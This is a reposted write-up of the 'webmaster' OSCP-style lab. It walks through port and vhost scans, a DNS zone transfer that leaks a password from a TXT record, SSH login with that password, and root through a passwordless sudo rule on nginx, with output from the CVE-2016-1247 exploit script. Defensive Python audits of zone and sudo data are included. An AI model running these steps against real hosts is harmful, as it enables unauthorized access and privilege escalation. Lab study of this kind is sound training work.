【OSCP】webmaster

admin, 2024-08-12 20:55:48, 24 views, 5630 characters, 18 min 46 s read


OSCP labs


Lab overview

webmaster

easy

DNS service exploitation, sudo nginx privilege escalation

Information gathering

Host discovery

nmap -sn 192.168.1.0/24


Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.131
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 03:29 EST
Nmap scan report for 192.168.1.131
Host is up (0.00058s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
|   256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_  256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open  domain  (unknown banner: not currently available)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    currently available
| dns-nsid: 
|_  bind.version: not currently available
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94%I=7%D=2/18%Time=65D1C00A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,52,"\0P\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x18\x17not\x20curren
SF:tly\x20available\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
MAC Address: 08:00:27:3F:B8:3D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory scan

Add a hosts entry for webmaster.hmv, then scan for directories.

┌──(root㉿kali)-[~]
└─# vim /etc/hosts

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://webmaster.hmv -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://webmaster.hmv
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://webmaster.hmv/index.html (Status: 200) [Size: 57]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

Subdomain (virtual host) scan

┌──(root㉿kali)-[~]
└─# wfuzz -u 'http://webmaster.hmv' -H 'Host: FUZZ.webmaster.hmv' -t 100 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --hh 57
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning:urllib3 (1.25.8) or chardet (5.0.0)/charset_normalizer (2.0.7) doesn't match a supported version!
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://webmaster.hmv/
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

Total time: 0
Processed Requests: 114441
Filtered Requests: 114441
Requests/sec.: 0

Probe the DNS service

┌──(root㉿kali)-[~]
└─# dig axfr @192.168.1.131 webmaster.hmv

; <<>> DiG 9.18.16-1-Debian <<>> axfr @192.168.1.131 webmaster.hmv
; (1 server found)
;; global options: +cmd
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv. 604800 IN NS ns1.webmaster.hmv.
ftp.webmaster.hmv. 604800 IN CNAME www.webmaster.hmv.
john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"
mail.webmaster.hmv. 604800 IN A 192.168.0.12
ns1.webmaster.hmv. 604800 IN A 127.0.0.1
www.webmaster.hmv. 604800 IN A 192.168.0.11
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.1.131#53(192.168.1.131) (TCP)
;; WHEN: Sun Feb 18 03:49:51 EST 2024
;; XFR size: 8 records (messages 1, bytes 274)
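Two defender-side findings sit in that output: the server answered an AXFR from an arbitrary client, and a TXT record under a user's name holds what looks like a password. As an added example (not from the original post), the following Python script parses `dig axfr` output, here a constructed string holding the records shown above, and flags the open transfer, credential-like TXT values, and A records pointing at loopback; the hint lists are assumptions, not a standard.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample: the record lines dig printed for the lab's AXFR above
ZONE_DUMP = """\
; <<>> DiG 9.18.16-1-Debian <<>> axfr @192.168.1.131 webmaster.hmv
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv. 604800 IN NS ns1.webmaster.hmv.
ftp.webmaster.hmv. 604800 IN CNAME www.webmaster.hmv.
john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"
mail.webmaster.hmv. 604800 IN A 192.168.0.12
ns1.webmaster.hmv. 604800 IN A 127.0.0.1
www.webmaster.hmv. 604800 IN A 192.168.0.11
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
;; XFR size: 8 records (messages 1, bytes 274)
"""

@dataclass
class Record:
    name: str
    ttl: int
    rtype: str
    rdata: str

# owner  TTL  IN  TYPE  rdata  (dig separates the fields with tabs or spaces)
RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(.*)$")

def parse_axfr(text):
    """Return the resource records from `dig axfr` output; ';' comment lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            records.append(Record(m.group(1), int(m.group(2)), m.group(3), m.group(4)))
    return records

# Assumed heuristics: substrings that suggest a TXT value is a stored secret, and
# prefixes of TXT records that legitimately belong in a public zone.
SECRET_HINTS = ("pass", "pazz", "pwd", "secret", "token", "apikey")
PUBLIC_TXT_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1", "google-site-verification=")

def audit(records):
    """Return (finding, record) pairs in the order they were observed."""
    findings = []
    # A complete transfer is bracketed by the SOA record: if both ends are present,
    # the server handed the whole zone to whoever asked.
    if len(records) >= 2 and records[0].rtype == "SOA" and records[-1].rtype == "SOA":
        findings.append(("zone transfer (AXFR) allowed to an unauthorised client", records[0]))
    for rec in records:
        if rec.rtype == "TXT":
            value = rec.rdata.strip('"').lower()
            if not value.startswith(PUBLIC_TXT_PREFIXES) and any(h in value for h in SECRET_HINTS):
                findings.append(("TXT record looks like a stored credential", rec))
        elif rec.rtype == "A":
            try:
                addr = ipaddress.ip_address(rec.rdata)
            except ValueError:
                continue
            if addr.is_loopback:
                findings.append(("A record resolves to a loopback address", rec))
    return findings

if __name__ == "__main__":
    for finding, rec in audit(parse_axfr(ZONE_DUMP)):
        print(f"[!] {finding}: {rec.name} {rec.rtype} {rec.rdata}")
```

On BIND the transfer itself is closed with `allow-transfer { none; };` (or a list of secondary addresses) in the zone or options block; the TXT record simply has to go and the password be rotated, because a transfer log rarely shows who has already pulled the zone.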

Gaining access

Trying the string from the DNS TXT record (john.webmaster.hmv, "Myhiddenpazzword") as john's SSH password succeeds and gives a shell.

Privilege escalation

john@webmaster:/home$ sudo -l
Matching Defaults entries for john on webmaster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User john may run the following commands on webmaster:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx

Try the nginx local privilege escalation exploit (CVE-2016-1247, nginxed-root.sh).

john@webmaster:/var/www/html$  find / -name error.log 2>/dev/null
/var/log/nginx/error.log
john@webmaster:/var/www/html$ cd /tmp
john@webmaster:/tmp$ ls
40768.sh  systemd-private-1c3a990ff89c4c06871c36a7516e4680-systemd-timesyncd.service-CJcxvG
john@webmaster:/tmp$ ./40768.sh /var/log/nginx/error.log 
 _______________________________
< Is your server (N)jinxed ? ;o >
 -------------------------------
                                 __---__
                    _-       /--______
               __--( /      )XXXXXXXXXXXv.
             .-XXX(   O   O  )XXXXXXXXXXXXXXX-
            /XXX(       U     )        XXXXXXX
          /XXXXX(              )--_  XXXXXXXXXXX
         /XXXXX/ (      O     )   XXXXXX   XXXXX
         XXXXX/   /            XXXXXX   __ XXXXX
         XXXXXX__/          XXXXXX         __---->
 ---___  XXX__/          XXXXXX      __         /
   -  --__/   ___/  XXXXXX            /  ___--/=
    -    ___/    XXXXXX              '--- XXXXXX
       -/XXX XXXXXX                      /XXXXX
         XXXXXXXXX                       /XXXXX/
          XXXXXX      >                 _/XXXXX/
            XXXXX--__/              __-- XXXX/
             -XXXXXXXX---------------  XXXXXX-
                XXXXXXXXXXXXXXXXXXXXXXXXXX/
                  ""VXXXXXXXXXXXXXXXXXXV""

Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247)
nginxed-root.sh (ver. 1.0)

Discovered and coded by:

Dawid Golunski
https://legalhackers.com

[+] Starting the exploit as:
uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

[!] You need to execute the exploit as www-data user! Exiting.

Because the script has to be executed as the www-data user, we would still need to obtain www-data privileges first.

Reference: https://icepng.github.io/2017/05/15/CVE-2016-1247/

I had planned to write a webshell to get www-data and then run the script, but after writing it I found the shell was already running as root.
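The root cause here is the sudo rule itself, not CVE-2016-1247: nginx started through sudo runs its master process as root, accepts any configuration file via -c, and the configuration's user directive decides which account the workers run as, so a passwordless rule on the bare binary hands the caller root, which is why the webshell landed as root without the script ever running. As an added example (not from the original post), this Python audit parses `sudo -l` output, here a constructed string that repeats the lab's rule plus two other rules for contrast, and ranks each rule; the CONFIG_DRIVEN table and the severity levels are my assumptions.

```python
import re
import shlex
from dataclasses import dataclass, field

# Constructed sample: the lab's `sudo -l` output plus two extra rules for contrast
SUDO_L_OUTPUT = """\
Matching Defaults entries for john on webmaster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User john may run the following commands on webmaster:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
    (root) /usr/bin/systemctl restart nginx
    (ALL) NOPASSWD: /usr/bin/apt-get upgrade
"""

@dataclass
class SudoRule:
    runas: str            # user half of the "(user : group)" spec
    nopasswd: bool
    command: str          # command as printed: "ALL" or a path plus fixed arguments
    binary: str = ""
    args: list = field(default_factory=list)

@dataclass
class Finding:
    severity: str
    rule: SudoRule
    reason: str

# "(runas) TAG: TAG: command"  (one command per line; comma-separated lists are not split here)
RULE_LINE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Assumed table: daemons that take their configuration file from the command line, so a
# rule on the bare binary lets the caller decide what the root-owned process does.
CONFIG_DRIVEN = {
    "/usr/sbin/nginx": "nginx -c loads any config file; its 'user' directive picks the worker uid",
    "/usr/sbin/apache2": "apache2 -f loads any config file",
}

def parse_sudo_l(text):
    """Extract the command rules from `sudo -l` output (the lines after 'may run')."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules or not line.startswith("("):
            continue
        m = RULE_LINE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        cmd = m.group("cmd").strip()
        rule = SudoRule(runas, "NOPASSWD:" in m.group("tags").upper(), cmd)
        if cmd != "ALL":
            parts = shlex.split(cmd)
            rule.binary, rule.args = parts[0], parts[1:]
        rules.append(rule)
    return rules

def classify(rule):
    """Severity for one rule, or None when nothing stands out."""
    if rule.command == "ALL":
        return Finding("critical", rule, f"any command as {rule.runas}")
    if rule.binary in CONFIG_DRIVEN and not rule.args:
        return Finding("high", rule, CONFIG_DRIVEN[rule.binary])
    if rule.nopasswd and not rule.args:
        return Finding("medium", rule, "passwordless rule with unrestricted arguments")
    if rule.nopasswd:
        return Finding("low", rule, "passwordless rule; confirm the fixed arguments cannot be abused")
    return None

def audit_sudo(text):
    """Parse `sudo -l` output and return the rules worth a second look."""
    return [f for f in map(classify, parse_sudo_l(text)) if f is not None]

if __name__ == "__main__":
    for f in audit_sudo(SUDO_L_OUTPUT):
        print(f"[{f.severity}] ({f.rule.runas}) {f.rule.command}: {f.reason}")
```

The fix for the lab's rule is to remove it, or to restart the daemon through the service manager with pinned arguments (the second sample line, `/usr/bin/systemctl restart nginx`), so that nginx only ever loads its system configuration; sudo's own log will then show any attempt to launch the binary with extra arguments.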

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】webmaster

Reposted by CN-SEC中文网 (keep this link when sharing): http://cn-sec.com/archives/3057021.html